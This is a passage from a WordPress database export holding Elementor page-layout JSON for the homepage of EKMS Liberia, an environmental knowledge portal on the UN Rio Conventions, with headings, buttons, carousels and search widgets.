ax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11478,1863,'_elementor_version','2.7.5'),(11479,1863,'_elementor_template_type','wp-page'),(11480,1863,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11482,1864,'_wp_page_template','default'),(11483,1864,'_elementor_edit_mode','builder'),(11484,1864,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological 